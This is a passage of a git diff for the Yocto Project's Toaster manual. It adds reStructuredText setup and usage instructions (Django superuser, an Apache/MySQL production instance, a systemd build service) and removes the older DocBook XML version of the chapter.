+To access the Django administration interface, you must create a
+superuser by following these steps:
+
+#. If you used ``pip3``, which is recommended, to set up the Toaster
+   system dependencies, you need be sure the local user path is in your
+   ``PATH`` list. To append the pip3 local user path, use the following
+   command::
+
+      $ export PATH=$PATH:$HOME/.local/bin
+
+#. From the directory containing the Toaster database, which by default
+   is the :term:`Build Directory`,
+   invoke the ``createsuperuser`` command from ``manage.py``::
+
+      $ cd ~/poky/build
+      $ ../bitbake/lib/toaster/manage.py createsuperuser
+
+#. Django prompts you for the username, which you need to provide.
+
+#. Django prompts you for an email address, which is optional.
+
+#. Django prompts you for a password, which you must provide.
+
+#. Django prompts you to re-enter your password for verification.
+
+After completing these steps, the following confirmation message
+appears::
+
+   Superuser created successfully.
+
+Creating a superuser allows you to access the Django administration
+interface through a browser. The URL for this interface is the same as
+the URL used for the Toaster instance with "/admin" on the end. For
+example, if you are running Toaster locally, use the following URL::
+
+   http://127.0.0.1:8000/admin
+
+You can use the Django administration interface to set Toaster configuration
+parameters such as the build directory, layer sources, default variable
+values, and BitBake versions.
+
+.. _toaster-setting-up-a-production-instance-of-toaster:
+
+Setting Up a Production Instance of Toaster
+===========================================
+
+You can use a production instance of Toaster to share the Toaster
+instance with remote users, multiple users, or both. The production
+instance is also the setup that can handle heavier loads on the web
+service. Use the instructions in the following sections to set up
+Toaster to run builds through the Toaster web interface.
+
+.. _toaster-production-instance-requirements:
+
+Requirements
+------------
+
+Be sure you meet the following requirements:
+
+.. note::
+
+   You must comply with all Apache, ``mod-wsgi``, and Mysql requirements.
+
+-  Have all the build requirements as described in the ":ref:`toaster-manual/toaster-manual-start:Preparing to
+   Use Toaster`" chapter.
+
+-  Have an Apache webserver.
+
+-  Have ``mod-wsgi`` for the Apache webserver.
+
+-  Use the Mysql database server.
+
+-  If you are using Ubuntu, run the following::
+
+      $ sudo apt-get install apache2 libapache2-mod-wsgi-py3 mysql-server python3-pip libmysqlclient-dev
+
+-  If you are using Fedora or a RedHat distribution, run the
+   following::
+
+      $ sudo dnf install httpd python3-mod_wsgi python3-pip mariadb-server mariadb-devel python3-devel
+
+-  If you are using openSUSE, run the following::
+
+      $ sudo zypper install apache2 apache2-mod_wsgi-python3 python3-pip mariadb mariadb-client python3-devel
+
+.. _toaster-installation-steps:
+
+Installation
+------------
+
+Perform the following steps to install Toaster:
+
+#.  Create toaster user and set its home directory to
+    ``/var/www/toaster``::
+
+      $ sudo /usr/sbin/useradd toaster -md /var/www/toaster -s /bin/false
+      $ sudo su - toaster -s /bin/bash
+
+#.  Checkout a copy of ``poky`` into the web server directory. You will
+    be using ``/var/www/toaster``::
+
+      $ git clone git://git.yoctoproject.org/poky
+      $ git checkout &DISTRO_NAME_NO_CAP;
+
+#.  Install Toaster dependencies using the --user flag which keeps the
+    Python packages isolated from your system-provided packages::
+
+      $ cd /var/www/toaster/
+      $ pip3 install --user -r ./poky/bitbake/toaster-requirements.txt
+      $ pip3 install --user mysqlclient
+
+    .. note::
+
+       Isolating these packages is not required but is recommended.
+       Alternatively, you can use your operating system's package
+       manager to install the packages.
+
+#.  Configure Toaster by editing
+    ``/var/www/toaster/poky/bitbake/lib/toaster/toastermain/settings.py``
+    as follows:
+
+    -  Edit the
+       `DATABASES <https://docs.djangoproject.com/en/2.2/ref/settings/#databases>`__
+       settings:
+
+       .. code-block:: python
+
+         DATABASES = {
+            'default': {
+               'ENGINE': 'django.db.backends.mysql',
+               'NAME': 'toaster_data',
+               'USER': 'toaster',
+               'PASSWORD': 'yourpasswordhere',
+               'HOST': 'localhost',
+               'PORT': '3306',
+            }
+         }
+
+    -  Edit the
+       `SECRET_KEY <https://docs.djangoproject.com/en/2.2/ref/settings/#std:setting-SECRET_KEY>`__:
+
+       .. code-block:: python
+
+         SECRET_KEY = 'your_secret_key'
+
+    -  Edit the
+       `STATIC_ROOT <https://docs.djangoproject.com/en/2.2/ref/settings/#std:setting-STATIC_ROOT>`__:
+
+      .. code-block:: python
+
+         STATIC_ROOT = '/var/www/toaster/static_files/'
+
+#.  Add the database and user to the ``mysql`` server defined earlier::
+
+      $ mysql -u root -p
+      mysql> CREATE DATABASE toaster_data;
+      mysql> CREATE USER 'toaster'@'localhost' identified by 'yourpasswordhere';
+      mysql> GRANT all on toaster_data.\* to 'toaster'@'localhost';
+      mysql> quit
+
+#.  Get Toaster to create the database schema, default data, and gather
+    the statically-served files::
+
+      $ cd /var/www/toaster/poky/
+      $ ./bitbake/lib/toaster/manage.py migrate
+      $ TOASTER_DIR=`pwd\` TEMPLATECONF='poky' \
+         ./bitbake/lib/toaster/manage.py checksettings
+      $ ./bitbake/lib/toaster/manage.py collectstatic
+
+
+    In the previous
+    example, from the ``poky`` directory, the ``migrate`` command
+    ensures the database schema changes have propagated correctly (i.e.
+    migrations). The next line sets the Toaster root directory
+    ``TOASTER_DIR`` and the location of the Toaster configuration file
+    ``TOASTER_CONF``, which is relative to ``TOASTER_DIR``. The
+    ``TEMPLATECONF`` value reflects the contents of
+    ``poky/.templateconf``, and by default, should include the string
+    "poky". For more information on the Toaster configuration file, see
+    the ":ref:`toaster-manual/toaster-manual-reference:Configuring Toaster`" section.
+
+    This line also runs the ``checksettings`` command, which configures
+    the location of the Toaster :term:`Build Directory`.
+    The Toaster
+    root directory ``TOASTER_DIR`` determines where the Toaster build
+    directory is created on the file system. In the example above,
+    ``TOASTER_DIR`` is set as follows::
+
+       /var/www/toaster/poky
+
+
+    This setting causes the Toaster build directory to be::
+
+       /var/www/toaster/poky/build
+
+    Finally, the ``collectstatic`` command is a Django framework command
+    that collects all the statically served files into a designated
+    directory to be served up by the Apache web server as defined by
+    ``STATIC_ROOT``.
+
+#.  Test and/or use the Mysql integration with Toaster's Django web
+    server. At this point, you can start up the normal Toaster Django
+    web server with the Toaster database in Mysql. You can use this web
+    server to confirm that the database migration and data population
+    from the Layer Index is complete.
+
+    To start the default Toaster Django web server with the Toaster
+    database now in Mysql, use the standard start commands::
+
+      $ source oe-init-build-env
+      $ source toaster start
+
+    Additionally, if Django is sufficient for your requirements, you can use
+    it for your release system and migrate later to Apache as your
+    requirements change.
+
+#.  Add an Apache configuration file for Toaster to your Apache web
+    server's configuration directory. If you are using Ubuntu or Debian,
+    put the file here::
+
+      /etc/apache2/conf-available/toaster.conf
+
+
+    If you are using Fedora or RedHat, put it here::
+
+      /etc/httpd/conf.d/toaster.conf
+
+    If you are using OpenSUSE, put it here::
+
+      /etc/apache2/conf.d/toaster.conf
+
+    Following is a sample Apache configuration for Toaster you can follow:
+
+    .. code-block:: apache
+
+      Alias /static /var/www/toaster/static_files
+      <Directory /var/www/toaster/static_files>
+         <IfModule mod_access_compat.c>
+            Order allow,deny
+            Allow from all
+         </IfModule>
+         <IfModule !mod_access_compat.c>
+            Require all granted
+         </IfModule>
+      </Directory>
+    
+      <Directory /var/www/toaster/poky/bitbake/lib/toaster/toastermain>
+         <Files "wsgi.py">
+            Require all granted
+         </Files>
+      </Directory>
+    
+      WSGIDaemonProcess toaster_wsgi python-path=/var/www/toaster/poky/bitbake/lib/toaster:/var/www/toaster/.local/lib/python3.4/site-packages
+      WSGIScriptAlias / "/var/www/toaster/poky/bitbake/lib/toaster/toastermain/wsgi.py"
+      <Location />
+         WSGIProcessGroup toaster_wsgi
+      </Location>
+
+
+    If you are using Ubuntu or Debian, you will need to enable the config and
+    module for Apache::
+
+      $ sudo a2enmod wsgi
+      $ sudo a2enconf toaster
+      $ chmod +x bitbake/lib/toaster/toastermain/wsgi.py
+
+    Finally, restart Apache to make sure all new configuration is loaded. For Ubuntu,
+    Debian, and OpenSUSE use::
+
+      $ sudo service apache2 restart
+
+    For Fedora and RedHat use::
+
+      $ sudo service httpd restart
+
+#.  Prepare the systemd service to run Toaster builds. Here is a sample
+    configuration file for the service:
+
+    .. code-block:: ini
+
+      [Unit]
+      Description=Toaster runbuilds
+      
+      [Service]
+      Type=forking User=toaster
+      ExecStart=/usr/bin/screen -d -m -S runbuilds /var/www/toaster/poky/bitbake/lib/toaster/runbuilds-service.sh start
+      ExecStop=/usr/bin/screen -S runbuilds -X quit
+      WorkingDirectory=/var/www/toaster/poky
+      
+      [Install]
+      WantedBy=multi-user.target
+
+
+    Prepare the ``runbuilds-service.sh`` script that you need to place in the
+    ``/var/www/toaster/poky/bitbake/lib/toaster/`` directory by setting
+    up executable permissions::
+
+      #!/bin/bash
+      
+      #export http_proxy=http://proxy.host.com:8080
+      #export https_proxy=http://proxy.host.com:8080
+      #export GIT_PROXY_COMMAND=$HOME/bin/gitproxy
+      cd ~/poky/
+      source ./oe-init-build-env build
+      source ../bitbake/bin/toaster $1 noweb
+      [ "$1" == 'start' ] && /bin/bash
+
+#.  Run the service::
+
+       $ sudo service runbuilds start
+
+    Since the service is running in a detached screen session, you can
+    attach to it using this command::
+
+       $ sudo su - toaster
+       $ screen -rS runbuilds
+
+    You can detach from the service again using "Ctrl-a" followed by "d" key
+    combination.
+
+You can now open up a browser and start using Toaster.
+
+Using the Toaster Web Interface
+===============================
+
+The Toaster web interface allows you to do the following:
+
+-  Browse published layers in the `OpenEmbedded Layer
+   Index <http://layers.openembedded.org>`__ that are available for your
+   selected version of the build system.
+
+-  Import your own layers for building.
+
+-  Add and remove layers from your configuration.
+
+-  Set configuration variables.
+
+-  Select a target or multiple targets to build.
+
+-  Start your builds.
+
+-  See what was built (recipes and packages) and what packages were
+   installed into your final image.
+
+-  Browse the directory structure of your image.
+
+-  See the value of all variables in your build configuration, and which
+   files set each value.
+
+-  Examine error, warning and trace messages to aid in debugging.
+
+-  See information about the BitBake tasks executed and reused during
+   your build, including those that used shared state.
+
+-  See dependency relationships between recipes, packages and tasks.
+
+-  See performance information such as build time, task time, CPU usage,
+   and disk I/O.
+
+.. _web-interface-videos:
+
+Toaster Web Interface Videos
+----------------------------
+
+Following are several videos that show how to use the Toaster GUI:
+
+-  *Build Configuration:* This
+   `video <https://www.youtube.com/watch?v=qYgDZ8YzV6w>`__ overviews and
+   demonstrates build configuration for Toaster.
+
+-  *Build Custom Layers:* This
+   `video <https://www.youtube.com/watch?v=QJzaE_XjX5c>`__ shows you how
+   to build custom layers that are used with Toaster.
+
+-  *Toaster Homepage and Table Controls:* This
+   `video <https://www.youtube.com/watch?v=QEARDnrR1Xw>`__ goes over the
+   Toaster entry page, and provides an overview of the data manipulation
+   capabilities of Toaster, which include search, sorting and filtering
+   by different criteria.
+
+-  *Build Dashboard:* This
+   `video <https://www.youtube.com/watch?v=KKqHYcnp2gE>`__ shows you the
+   build dashboard, a page providing an overview of the information
+   available for a selected build.
+
+-  *Image Information:* This
+   `video <https://www.youtube.com/watch?v=XqYGFsmA0Rw>`__ walks through
+   the information Toaster provides about images: packages installed and
+   root file system.
+
+-  *Configuration:* This
+   `video <https://www.youtube.com/watch?v=UW-j-T2TzIg>`__ provides
+   Toaster build configuration information.
+
+-  *Tasks:* This `video <https://www.youtube.com/watch?v=D4-9vGSxQtw>`__
+   shows the information Toaster provides about the tasks run by the
+   build system.
+
+-  *Recipes and Packages Built:* This
+   `video <https://www.youtube.com/watch?v=x-6dx4huNnw>`__ shows the
+   information Toaster provides about recipes and packages built.
+
+-  *Performance Data:* This
+   `video <https://www.youtube.com/watch?v=qWGMrJoqusQ>`__ shows the
+   build performance data provided by Toaster.
+
+.. _a-note-on-the-local-yocto-project-release:
+
+Additional Information About the Local Yocto Project Release
+------------------------------------------------------------
+
+This section only applies if you have set up Toaster for local
+development, as explained in the
+":ref:`toaster-manual/toaster-manual-setup-and-use:starting toaster for local development`"
+section.
+
+When you create a project in Toaster, you will be asked to provide a
+name and to select a Yocto Project release. One of the release options
+you will find is called "Local Yocto Project".
+
+.. image:: figures/new-project.png
+   :align: center
+   :scale: 75%
+
+When you select the "Local Yocto Project" release, Toaster will run your
+builds using the local Yocto Project clone you have in your computer:
+the same clone you are using to run Toaster. Unless you manually update
+this clone, your builds will always use the same Git revision.
+
+If you select any of the other release options, Toaster will fetch the
+tip of your selected release from the upstream `Yocto Project
+repository <https://git.yoctoproject.org>`__ every time you run a build.
+Fetching this tip effectively means that if your selected release is
+updated upstream, the Git revision you are using for your builds will
+change. If you are doing development locally, you might not want this
+change to happen. In that case, the "Local Yocto Project" release might
+be the right choice.
+
+However, the "Local Yocto Project" release will not provide you with any
+compatible layers, other than the three core layers that come with the
+Yocto Project:
+
+-  `openembedded-core <http://layers.openembedded.org/layerindex/branch/master/layer/openembedded-core/>`__
+
+-  `meta-poky <http://layers.openembedded.org/layerindex/branch/master/layer/meta-poky/>`__
+
+-  `meta-yocto-bsp <http://layers.openembedded.org/layerindex/branch/master/layer/meta-yocto-bsp/>`__
+
+.. image:: figures/compatible-layers.png
+   :align: center
+   :scale: 75%
+
+If you want to build any other layers, you will need to manually import
+them into your Toaster project, using the "Import layer" page.
+
+.. image:: figures/import-layer.png
+   :align: center
+   :scale: 75%
+
+.. _toaster-web-interface-preferred-version:
+
+Building a Specific Recipe Given Multiple Versions
+--------------------------------------------------
+
+Occasionally, a layer might provide more than one version of the same
+recipe. For example, the ``openembedded-core`` layer provides two
+versions of the ``bash`` recipe (i.e. 3.2.48 and 4.3.30-r0) and two
+versions of the ``which`` recipe (i.e. 2.21 and 2.18). The following
+figure shows this exact scenario:
+
+.. image:: figures/bash-oecore.png
+   :align: center
+   :scale: 75%
+
+By default, the OpenEmbedded build system builds one of the two recipes.
+For the ``bash`` case, version 4.3.30-r0 is built by default.
+Unfortunately, Toaster as it exists, is not able to override the default
+recipe version. If you would like to build bash 3.2.48, you need to set
+the
+:term:`PREFERRED_VERSION`
+variable. You can do so from Toaster, using the "Add variable" form,
+which is available in the "BitBake variables" page of the project
+configuration section as shown in the following screen:
+
+.. image:: figures/add-variable.png
+   :align: center
+   :scale: 75%
+
+To specify ``bash`` 3.2.48 as the version to build, enter
+"PREFERRED_VERSION_bash" in the "Variable" field, and "3.2.48" in the
+"Value" field. Next, click the "Add variable" button:
+
+.. image:: figures/set-variable.png
+   :align: center
+   :scale: 75%
+
+After clicking the "Add variable" button, the settings for
+``PREFERRED_VERSION`` are added to the bottom of the BitBake variables
+list. With these settings, the OpenEmbedded build system builds the
+desired version of the recipe rather than the default version:
+
+.. image:: figures/variable-added.png
+   :align: center
+   :scale: 75%
diff --git a/documentation/toaster-manual/toaster-manual-setup-and-use.xml b/documentation/toaster-manual/toaster-manual-setup-and-use.xml
deleted file mode 100644
index b4caebbe0f..0000000000
--- a/documentation/toaster-manual/toaster-manual-setup-and-use.xml
+++ /dev/null
@@ -1,843 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='toaster-manual-setup-and-use'>
-
-<title>Setting Up and Using Toaster</title>
-
-    <section id='starting-toaster-for-local-development'>
-        <title>Starting Toaster for Local Development</title>
-
-        <para>
-            Once you have set up the Yocto Project and installed the
-            Toaster system dependencies as described in the
-            "<link linkend='toaster-manual-start'>Preparing to Use Toaster</link>"
-            chapter, you are ready to start Toaster.
-        </para>
-
-        <para>
-            Navigate to the root of your
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            (e.g. <filename>poky</filename>):
-            <literallayout class='monospaced'>
-     $ cd poky
-            </literallayout>
-            Once in that directory, source the build environment script:
-            <literallayout class='monospaced'>
-     $ source oe-init-build-env
-            </literallayout>
-            Next, from the build directory (e.g.
-            <filename>poky/build</filename>), start Toaster using this
-            command:
-            <literallayout class='monospaced'>
-     $ source toaster start
-            </literallayout>
-            You can now run your builds from the command line, or with
-            Toaster as explained in section
-            "<link linkend='using-the-toaster-web-interface'>Using the Toaster Web Interface</link>".
-        </para>
-
-        <para>
-            To access the Toaster web interface, open your favorite
-            browser and enter the following:
-            <literallayout class='monospaced'>
-     http://127.0.0.1:8000
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='setting-a-different-port'>
-        <title>Setting a Different Port</title>
-
-        <para>
-            By default, Toaster starts on port 8000.
-            You can use the <filename>WEBPORT</filename> parameter to
-            set a different port.
-            For example, the following command sets the port to "8400":
-            <literallayout class='monospaced'>
-     $ source toaster start webport=8400
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='setting-up-toaster-without-a-web-server'>
-        <title>Setting Up Toaster Without a Web Server</title>
-
-        <para>
-            You can start a Toaster environment without starting its
-            web server. This is useful for the following:
-            <itemizedlist>
-                <listitem><para>
-                    Capturing a command-line build’s statistics into
-                    the Toaster database for examination later.
-                    </para></listitem>
-                <listitem><para>
-                    Capturing a command-line build’s statistics when
-                    the Toaster server is already running.
-                    </para></listitem>
-                <listitem><para>
-                    Having one instance of the Toaster web server
-                    track and capture multiple command-line builds,
-                    where each build is started in its own “noweb�
-                    Toaster environment.
-                    </para></listitem>
-            </itemizedlist>
-            The following commands show how to start a Toaster environment
-            without starting its web server, perform BitBake operations,
-            and then shut down the Toaster environment.
-            Once the build is complete, you can close the Toaster environment.
-            Before closing the environment, however, you should allow a few
-            minutes to ensure the complete transfer of its BitBake build
-            statistics to the Toaster database.
-            If you have a separate Toaster web server instance running, you
-            can watch this command-line build’s progress and examine the
-            results as soon as they are posted:
-            <literallayout class='monospaced'>
-     $ source toaster start noweb
-     $ bitbake <replaceable>target</replaceable>
-     $ source toaster stop
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='setting-up-toaster-without-a-build-server'>
-        <title>Setting Up Toaster Without a Build Server</title>
-
-        <para>
-            You can start a Toaster environment with the
-            “New Projects� feature disabled.
-            Doing so is useful for the following:
-            <itemizedlist>
-                <listitem><para>
-                    Sharing your build results over the web server while
-                    blocking others from starting builds on your host.
-                    </para></listitem>
-                <listitem><para>
-                    Allowing only local command-line builds to be captured
-                    into the Toaster database.
-                    </para></listitem>
-            </itemizedlist>
-            Use the following command to set up Toaster without a
-            build server:
-            <literallayout class='monospaced'>
-     $ source toaster start nobuild webport=<replaceable>port</replaceable>
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='setting-up-external-access'>
-        <title>Setting up External Access</title>
-
-        <para>
-            By default, Toaster binds to the loop back address
-            (i.e. localhost), which does not allow access from
-            external hosts. To allow external access, use the
-            <filename>WEBPORT</filename> parameter to open an
-            address that connects to the network, specifically the
-            IP address that your NIC uses to connect to the network.
-            You can also bind to all IP addresses the computer
-            supports by using the shortcut
-            "0.0.0.0:<replaceable>port</replaceable>".
-        </para>
-
-        <para>
-            The following example binds to all IP addresses on the
-            host:
-            <literallayout class='monospaced'>
-     $ source toaster start webport=0.0.0.0:8400
-            </literallayout>
-            This example binds to a specific IP address on the host's
-            NIC:
-            <literallayout class='monospaced'>
-     $ source toaster start webport=192.168.1.1:8400
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='the-directory-for-cloning-layers'>
-        <title>The Directory for Cloning Layers</title>
-
-        <para>
-            Toaster creates a <filename>_toaster_clones</filename>
-            directory inside your Source Directory
-            (i.e. <filename>poky</filename>) to clone any layers
-            needed for your builds.
-        </para>
-
-        <para>
-            Alternatively, if you would like all of your Toaster related
-            files and directories to be in a particular location other than
-            the default, you can set the <filename>TOASTER_DIR</filename>
-            environment variable, which takes precedence over your current
-            working directory.
-            Setting this environment variable causes Toaster to create and use
-            <filename>$TOASTER_DIR./_toaster_clones</filename>.
-        </para>
-    </section>
-
-    <section id='toaster-the-build-directory'>
-        <title>The Build Directory</title>
-
-        <para>
-            Toaster creates a build directory within your Source
-            Directory (e.g. <filename>poky</filename>) to execute
-            the builds.
-        </para>
-
-        <para>
-            Alternatively, if you would like all of your Toaster related files
-            and directories to be in a particular location, you can set
-            the <filename>TOASTER_DIR</filename> environment variable,
-            which takes precedence over your current working directory.
-            Setting this environment variable causes Toaster to use
-            <filename>$TOASTER_DIR/build</filename> as the build directory.
-        </para>
-    </section>
-
-    <section id='toaster-creating-a-django-super-user'>
-        <title>Creating a Django Superuser</title>
-
-        <para>
-            Toaster is built on the
-            <ulink url='https://www.djangoproject.com/'>Django framework</ulink>.
-            Django provides an administration interface you can use
-            to edit Toaster configuration parameters.
-        </para>
-
-        <para>
-            To access the Django administration interface, you must
-            create a superuser by following these steps:
-            <orderedlist>
-              <listitem><para>
-                  If you used <filename>pip3</filename>, which is
-                  recommended, to set up the Toaster system dependencies,
-                  you need be sure the local user path is in your
-                  <filename>PATH</filename> list.
-                  To append the pip3 local user path, use the following
-                  command:
-                  <literallayout class='monospaced'>
-   $ export PATH=$PATH:$HOME/.local/bin
-                  </literallayout>
-                  </para></listitem>
-              <listitem><para>
-                  From the directory containing the Toaster database,
-                  which by default is the
-                  <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                  invoke the <filename>createsuperuser</filename> command
-                  from <filename>manage.py</filename>:
-                  <literallayout class='monospaced'>
-   $ cd ~/poky/build
-   $ ../bitbake/lib/toaster/manage.py createsuperuser
-                  </literallayout>
-                  </para></listitem>
-              <listitem><para>
-                  Django prompts you for the username, which you need to
-                  provide.
-                  </para></listitem>
-              <listitem><para>
-                  Django prompts you for an email address, which is
-                  optional.
-                  </para></listitem>
-              <listitem><para>
-                  Django prompts you for a password, which you must provide.
-                  </para></listitem>
-              <listitem><para>
-                  Django prompts you to re-enter your password for verification.
-                  </para></listitem>
-          </orderedlist>
-          After completing these steps, the following confirmation message
-          appears:
-          <literallayout class='monospaced'>
-   Superuser created successfully.
-          </literallayout>
-      </para>
-
-      <para>
-          Creating a superuser allows you to access the Django administration
-          interface through a browser.
-          The URL for this interface is the same as the URL used for the
-          Toaster instance with "/admin" on the end.
-          For example, if you are running Toaster locally, use the
-          following URL:
-          <literallayout class='monospaced'>
-   http://127.0.0.1:8000/admin
-          </literallayout>
-          You can use the Django administration interface to set Toaster
-          configuration parameters such as the build directory, layer sources,
-          default variable values, and BitBake versions.
-      </para>
-  </section>
-
-  <section id='toaster-setting-up-a-production-instance-of-toaster'>
-      <title>Setting Up a Production Instance of Toaster</title>
-
-      <para>
-          You can use a production instance of Toaster to share the
-          Toaster instance with remote users, multiple users, or both.
-          The production instance is also the setup that can handle
-          heavier loads on the web service.
-          Use the instructions in the following sections to set up
-          Toaster to run builds through the Toaster web interface.
-      </para>
-
-      <section id='toaster-production-instance-requirements'>
-          <title>Requirements</title>
-
-          <para>
-              Be sure you meet the following requirements:
-              <note>
-                  You must comply with all Apache,
-                  <filename>mod-wsgi</filename>, and Mysql requirements.
-              </note>
-              <itemizedlist>
-                  <listitem><para>
-                      Have all the build requirements as described in the
-                      "<link linkend='toaster-manual-start'>Preparing to Use Toaster</link>"
-                      chapter.
-                      </para></listitem>
-                  <listitem><para>
-                      Have an Apache webserver.
-                      </para></listitem>
-                  <listitem><para>
-                      Have <filename>mod-wsgi</filename> for the Apache
-                      webserver.
-                      </para></listitem>
-                  <listitem><para>
-                      Use the Mysql database server.
-                      </para></listitem>
-                  <listitem><para>
-                      If you are using Ubuntu 16.04, run the following:
-                      <literallayout class='monospaced'>
-   $ sudo apt-get install apache2 libapache2-mod-wsgi-py3 mysql-server python3-pip libmysqlclient-dev
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      If you are using Fedora 24 or a RedHat distribution, run
-                      the following:
-                      <literallayout class='monospaced'>
-   $ sudo dnf install httpd python3-mod_wsgi python3-pip mariadb-server mariadb-devel python3-devel
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      If you are using openSUSE Leap 42.1, run
-                      the following:
-                      <literallayout class='monospaced'>
-   $ sudo zypper install apache2 apache2-mod_wsgi-python3 python3-pip mariadb mariadb-client python3-devel
-                      </literallayout>
-                      </para></listitem>
-              </itemizedlist>
-          </para>
-      </section>
-
-      <section id='toaster-installation-steps'>
-          <title>Installation</title>
-
-          <para>
-              Perform the following steps to install Toaster:
-              <orderedlist>
-                  <listitem><para>
-                      Create toaster user and set its home directory to
-                      <filename>/var/www/toaster</filename>:
-                      <literallayout class='monospaced'>
-    $ sudo /usr/sbin/useradd toaster -md /var/www/toaster -s /bin/false
-    $ sudo su - toaster -s /bin/bash
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      Checkout a copy of <filename>poky</filename>
-                      into the web server directory.
-                      You will be using <filename>/var/www/toaster</filename>:
-                      <literallayout class='monospaced'>
-   $ git clone git://git.yoctoproject.org/poky
-   $ git checkout &DISTRO_NAME_NO_CAP;
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      Install Toaster
-                      dependencies using the --user flag which
-                      keeps the Python packages
-                      isolated from your system-provided packages:
-                      <literallayout class='monospaced'>
-   $ cd /var/www/toaster/
-   $ pip3 install --user -r ./poky/bitbake/toaster-requirements.txt
-   $ pip3 install --user mysqlclient
-                      </literallayout>
-                      <note>
-                          Isolating these packages is not required but is
-                          recommended.
-                          Alternatively, you can use your operating system's
-                          package manager to install the packages.
-                      </note>
-                      </para></listitem>
-                  <listitem><para>
-                      Configure Toaster by editing
-                      <filename>/var/www/toaster/poky/bitbake/lib/toaster/toastermain/settings.py</filename>
-                      as follows:
-                      <itemizedlist>
-                          <listitem><para>
-                              Edit the
-                              <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#databases'>DATABASES</ulink>
-                              settings:
-                              <literallayout class='monospaced'>
-   DATABASES = {
-       'default': {
-           'ENGINE': 'django.db.backends.mysql',
-           'NAME': 'toaster_data',
-           'USER': 'toaster',
-           'PASSWORD': 'yourpasswordhere',
-           'HOST': 'localhost',
-           'PORT': '3306',
-      }
-   }
-                              </literallayout>
-                              </para></listitem>
-                          <listitem><para>
-                              Edit the
-                              <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#std:setting-SECRET_KEY'>SECRET_KEY</ulink>:
-                              <literallayout class='monospaced'>
-   SECRET_KEY = '<replaceable>your_secret_key</replaceable>'
-                              </literallayout>
-                              </para></listitem>
-                          <listitem><para>
-                              Edit the
-                              <ulink url='https://docs.djangoproject.com/en/1.11/ref/settings/#std:setting-STATIC_ROOT'>STATIC_ROOT</ulink>:
-                              <literallayout class='monospaced'>
-   STATIC_ROOT = '/var/www/toaster/static_files/'
-                              </literallayout>
-                              </para></listitem>
-                      </itemizedlist>
-                      </para></listitem>
-                  <listitem><para>
-                      Add the database and user to the <filename>mysql</filename>
-                      server defined earlier:
-                      <literallayout class='monospaced'>
-   $ mysql -u root -p
-   mysql> CREATE DATABASE toaster_data;
-   mysql> CREATE USER 'toaster'@'localhost' identified by 'yourpasswordhere';
-   mysql> GRANT all on toaster_data.* to 'toaster'@'localhost';
-   mysql> quit
-                      </literallayout>
-                      </para></listitem>
-                  <listitem><para>
-                      Get Toaster to create the database schema,
-                      default data, and gather the statically-served files:
-                      <literallayout class='monospaced'>
-   $ cd  /var/www/toaster/poky/
-   $ ./bitbake/lib/toaster/manage.py migrate
-   $ TOASTER_DIR=`pwd` TEMPLATECONF='poky' \
-     ./bitbake/lib/toaster/manage.py checksettings
-   $ ./bitbake/lib/toaster/manage.py collectstatic
-                      </literallayout>
-                      In the previous example, from the <filename>poky</filename>
-                      directory, the <filename>migrate</filename> command
-                      ensures the database schema changes have propagated
-                      correctly (i.e. migrations).
-                      The next line sets the Toaster root directory
-                      <filename>TOASTER_DIR</filename> and the location
-                      of the Toaster configuration file
-                      <filename>TOASTER_CONF</filename>, which is relative to
-                      <filename>TOASTER_DIR</filename>.
-                      The <filename>TEMPLATECONF</filename> value reflects the
-                      contents of <filename>poky/.templateconf</filename>, and
-                      by default, should include the string "poky".
-                      For more information on the Toaster configuration
-                      file, see the
-                      "<link linkend='configuring-toaster'>Configuring Toaster</link>"
-                      section.</para>
-
-                      <para>This line also runs the <filename>checksettings</filename>
-                      command, which configures the location of the Toaster
-                      <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                      The Toaster root directory <filename>TOASTER_DIR</filename>
-                      determines where the Toaster build directory
-                      is created on the file system.
-                      In the example above,
-                      <filename>TOASTER_DIR</filename> is set as follows:
-                      <literallayout class="monospaced">
-   /var/www/toaster/poky
-                      </literallayout>
-                      This setting causes the Toaster build directory to be:
-                      <literallayout class="monospaced">
-   /var/www/toaster/poky/build
-                      </literallayout></para>
-
-                      <para>Finally, the <filename>collectstatic</filename> command
-                      is a Django framework command that collects all the
-                      statically served files into a designated directory to
-                      be served up by the Apache web server as defined by
-                      <filename>STATIC_ROOT</filename>.
-                      </para></listitem>
-                  <listitem><para>
-                      Test and/or use the Mysql integration with Toaster’s
-                      Django web server.
-                      At this point, you can start up the normal Toaster
-                      Django web server with the Toaster database in Mysql.
-                      You can use this web server to confirm that the database
-                      migration and data population from the Layer Index is
-                      complete.</para>
-
-                      <para>To start the default Toaster Django web server with
-                      the Toaster database now in Mysql, use the standard
-                      start commands:
-                      <literallayout class='monospaced'>
-   $ source oe-init-build-env
-   $ source toaster start
-                      </literallayout>
-                      Additionally, if Django is sufficient for your requirements,
-                      you can use it for your release system and migrate later
-                      to Apache as your requirements change.
-                      </para></listitem>
-                  <listitem><para>
-                      Add an Apache configuration file for Toaster to your Apache web
-                      server's configuration directory.
-                      If you are using Ubuntu or Debian, put the file here:
-                      <literallayout class='monospaced'>
-   /etc/apache2/conf-available/toaster.conf
-                      </literallayout>
-                      If you are using Fedora or RedHat, put it here:
-                      <literallayout class='monospaced'>
-   /etc/httpd/conf.d/toaster.conf
-                      </literallayout>
-                      If you are using OpenSUSE, put it here:
-                      <literallayout class='monospaced'>
-   /etc/apache2/conf.d/toaster.conf
-                      </literallayout>
-                      Following is a sample Apache configuration for Toaster
-                      you can follow:
-                      <literallayout class='monospaced'>
-   Alias /static /var/www/toaster/static_files
